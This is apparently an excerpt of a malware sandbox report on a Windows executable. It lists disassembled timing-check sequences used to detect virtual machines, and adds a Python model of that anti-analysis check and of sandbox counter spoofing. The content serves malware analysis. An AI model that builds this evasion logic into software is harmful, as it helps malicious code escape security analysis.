Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747125E second address: 74712DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007F9665989DB7h 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 jmp 00007F9665989DB6h 0x00000018 mov eax, dword ptr [esi+28h] 0x0000001b pushad 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 call 00007F9665989DB8h 0x00000025 mov dl, al 0x00000027 pop edx 0x00000028 popad 0x00000029 mov dword ptr [edx+28h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9665989DB9h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74712DB second address: 7471336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c pushad 0x0000000d mov bl, ch 0x0000000f popad 0x00000010 mov dword ptr [edx+2Ch], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9665249A07h 0x0000001c sbb ch, FFFFFFDEh 0x0000001f jmp 00007F9665249A09h 0x00000024 popfd 0x00000025 movzx eax, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471336 second address: 7471353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471353 second address: 7471365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471365 second address: 747137B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747137B second address: 7471381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471381 second address: 7471385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471385 second address: 7471389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471389 second address: 7471414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F9665989DB9h 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9665989DACh 0x0000001c add esi, 490B9EF8h 0x00000022 jmp 00007F9665989DABh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F9665989DB8h 0x0000002e or al, 00000058h 0x00000031 jmp 00007F9665989DABh 0x00000036 popfd 0x00000037 popad 0x00000038 mov word ptr [edx+32h], ax 0x0000003c pushad 0x0000003d mov edi, eax 0x0000003f pushad 0x00000040 call 00007F9665989DAEh 0x00000045 pop esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471414 second address: 7471470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+34h] 0x00000009 pushad 0x0000000a mov edi, 7E4891D0h 0x0000000f mov ecx, ebx 0x00000011 popad 0x00000012 mov dword ptr [edx+34h], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9665249A01h 0x0000001c and ah, 00000056h 0x0000001f jmp 00007F9665249A01h 0x00000024 popfd 0x00000025 jmp 00007F9665249A00h 0x0000002a popad 0x0000002b test ecx, 00000700h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471470 second address: 7471476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471476 second address: 747147A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747147A second address: 74714E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F96D59F802Dh 0x00000011 pushad 0x00000012 push ecx 0x00000013 movsx edi, cx 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007F9665989DAFh 0x0000001d add ah, FFFFFF9Eh 0x00000020 jmp 00007F9665989DB9h 0x00000025 popfd 0x00000026 popad 0x00000027 or dword ptr [edx+38h], FFFFFFFFh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov ax, dx 0x00000031 call 00007F9665989DAFh 0x00000036 pop eax 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74714E5 second address: 74714EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74714EB second address: 74714EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74714EF second address: 74714F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74B0CD6 second address: 74B0D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9665989DB4h 0x00000011 adc ax, 8968h 0x00000016 jmp 00007F9665989DABh 0x0000001b popfd 0x0000001c mov edi, eax 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9665989DAEh 0x00000029 and al, FFFFFFC8h 0x0000002c jmp 00007F9665989DABh 0x00000031 popfd 0x00000032 mov cx, 9D3Fh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74B0D37 second address: 74B0D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, cx 0x00000011 pushfd 0x00000012 jmp 00007F9665249A00h 0x00000017 xor eax, 36BA2158h 0x0000001d jmp 00007F96652499FBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 746072F second address: 746079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 631EAF0Ah 0x00000008 mov esi, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F9665989DADh 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov al, B2h 0x00000018 pushfd 0x00000019 jmp 00007F9665989DB9h 0x0000001e add esi, 039F75E6h 0x00000024 jmp 00007F9665989DB1h 0x00000029 popfd 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F9665989DB8h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 746079F second address: 74607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74607A3 second address: 74607A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740008F second address: 7400095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400095 second address: 7400099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74006C3 second address: 740070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F96652499FFh 0x00000009 or al, FFFFFFAEh 0x0000000c jmp 00007F9665249A09h 0x00000011 popfd 0x00000012 mov si, 4137h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F96652499FAh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 movzx esi, bx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740070F second address: 7400736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665989DAAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400736 second address: 740073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740073C second address: 7400742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400742 second address: 7400746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400746 second address: 740077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9665989DB4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9665989DB7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740077E second address: 7400796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400796 second address: 740079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B03 second address: 7400B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B07 second address: 7400B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B24 second address: 7400B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F96652499FCh 0x00000011 adc ch, 00000008h 0x00000014 jmp 00007F96652499FBh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F96652499FBh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B66 second address: 7400B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B7E second address: 7400B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B82 second address: 7400BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9665989DADh 0x00000010 xor ax, B386h 0x00000015 jmp 00007F9665989DB1h 0x0000001a popfd 0x0000001b mov ah, FDh 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BBC second address: 7400BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BC0 second address: 7400BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BC6 second address: 7400BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov eax, edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BD8 second address: 7400BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74509CE second address: 74509D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7430055 second address: 743005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 743005B second address: 74300A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, 02C3h 0x0000000e movzx ecx, dx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F96652499FBh 0x00000018 mov ebp, esp 0x0000001a jmp 00007F9665249A06h 0x0000001f and esp, FFFFFFF0h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F96652499FAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300A2 second address: 74300A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300A6 second address: 74300AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300AC second address: 74300DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665989DB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300DA second address: 74300F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300F2 second address: 743013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F9665989DB6h 0x00000011 push eax 0x00000012 jmp 00007F9665989DABh 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9665989DB5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 743013E second address: 74301AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushfd 0x0000000f jmp 00007F9665249A09h 0x00000014 sub ax, 1236h 0x00000019 jmp 00007F9665249A01h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov eax, edx 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9665249A07h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74301AB second address: 74301C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74301C8 second address: 74302E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e pushfd 0x0000000f jmp 00007F9665249A09h 0x00000014 sbb ah, FFFFFFB6h 0x00000017 jmp 00007F9665249A01h 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F9665249A01h 0x00000024 xchg eax, edi 0x00000025 jmp 00007F96652499FEh 0x0000002a mov edi, dword ptr [ebp+08h] 0x0000002d pushad 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F96652499FCh 0x00000035 or ah, 00000038h 0x00000038 jmp 00007F96652499FBh 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007F9665249A08h 0x00000044 jmp 00007F9665249A05h 0x00000049 popfd 0x0000004a popad 0x0000004b jmp 00007F9665249A00h 0x00000050 popad 0x00000051 mov dword ptr [esp+24h], 00000000h 0x00000059 jmp 00007F9665249A00h 0x0000005e lock bts dword ptr [edi], 00000000h 0x00000063 jmp 00007F9665249A00h 0x00000068 jc 00007F96D545BB67h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F9665249A07h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74302E1 second address: 743033E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jmp 00007F9665989DB7h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F9665989DABh 0x00000019 pushfd 0x0000001a jmp 00007F9665989DB8h 0x0000001f sbb esi, 7E691378h 0x00000025 jmp 00007F9665989DABh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 743033E second address: 743037D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F96652499FAh 0x00000011 mov ax, 9CA1h 0x00000015 popad 0x00000016 call 00007F96652499FEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460834 second address: 7460844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460844 second address: 7460848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460848 second address: 7460882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9665989DADh 0x00000010 xor eax, 6E74BE26h 0x00000016 jmp 00007F9665989DB1h 0x0000001b popfd 0x0000001c mov dl, ch 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74508D4 second address: 7450919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 19A2h 0x00000007 mov cl, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov edi, ecx 0x00000012 pushfd 0x00000013 jmp 00007F96652499FCh 0x00000018 or ah, 00000038h 0x0000001b jmp 00007F96652499FBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9665249A00h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7450919 second address: 7450928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7450928 second address: 745092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460AD3 second address: 7460AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460AEB second address: 7460AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460AEF second address: 7460B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, 975Eh 0x00000010 mov bx, CB6Ah 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460B04 second address: 7460B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A07h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460B1F second address: 7460B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
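The interceptor entries above all have the same shape: rdtsc, a few junk instructions (pushad/pushfd/jmp/popfd/popad), rdtsc again. The sample compares the two reads; a hypervisor that traps or virtualises RDTSC, or an analysis tool that single-steps the code, inflates the difference far beyond what a few register shuffles cost on bare metal. The following added example (not code from the sample or from Joe Sandbox) models that check and the two environments it can meet: an untouched hypervisor with expensive RDTSC exits, and a sandbox that answers every read with a synthetic, evenly spaced counter, which is what the "RDTSC instruction interceptor" label in the report describes. The threshold, the junk workload, the median rule and the use of time.perf_counter_ns() as a stand-in for the instruction are all assumptions of this example.

```python
"""Model of the RDTSC timing check behind the interceptor lines above.

Added example; not code from the sample or from Joe Sandbox. The threshold,
the junk workload, the median rule and the ns clock standing in for RDTSC
are this example's own choices.
"""
import statistics
import time
from typing import Callable, Dict, List

ReadTsc = Callable[[], int]


def junk_work(n: int = 64) -> int:
    # Stand-in for the register-shuffling padding between the two reads.
    acc = 0
    for i in range(n):
        acc ^= (i * 0x9E3779B1) & 0xFFFFFFFF
    return acc


def measure_deltas(read_tsc: ReadTsc, samples: int = 16) -> List[int]:
    """Repeat the sample's rdtsc / junk / rdtsc pattern and collect the deltas."""
    deltas = []
    for _ in range(samples):
        t0 = read_tsc()
        junk_work()
        t1 = read_tsc()
        deltas.append(t1 - t0)
    return deltas


def looks_virtualised(deltas: List[int], threshold: int) -> bool:
    """Median rather than a single read: one interrupt or context switch on a
    physical machine would otherwise produce a false positive."""
    return statistics.median(deltas) > threshold


def native_tsc() -> int:
    # Stand-in for the RDTSC instruction (assumption: a monotonic ns clock).
    return time.perf_counter_ns()


def make_fake_tsc(step: int) -> ReadTsc:
    """Counter that advances by a fixed `step` on every read, ignoring real time.

    step=20 models the sandbox behaviour the report calls an "RDTSC instruction
    interceptor": reads are answered with small, uniform increments, so the
    check passes even though the code is being instrumented.
    step=50_000 models an untouched hypervisor whose RDTSC exit costs
    thousands of cycles per read, the case the sample wants to detect."""
    state = {"tsc": 0}

    def read() -> int:
        state["tsc"] += step
        return state["tsc"]

    return read


def run_check(read_tsc: ReadTsc, threshold: int = 2_000, samples: int = 16) -> Dict[str, object]:
    deltas = measure_deltas(read_tsc, samples)
    return {"median": statistics.median(deltas),
            "virtualised": looks_virtualised(deltas, threshold)}


if __name__ == "__main__":
    # The ns clock needs a generous threshold; the two fakes use the default.
    print("this host      :", run_check(native_tsc, threshold=1_000_000))
    print("interceptor    :", run_check(make_fake_tsc(20)))
    print("trapped rdtsc  :", run_check(make_fake_tsc(50_000)))
```

The point of the median is robustness on the attacker's side: a single inflated delta is normal on any busy machine, so a check that fires on one outlier would also fire on real victims. The point of the interceptor is that the check only sees what the sandbox lets it see; once every RDTSC is answered synthetically, the delta carries no information about the host, which is why this sample's many paired reads still left it running long enough to reach its C2.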
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Special instruction interceptor: First address: 1475A69 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Special instruction interceptor: First address: 14759CA instructions caused by: Self-modifying code
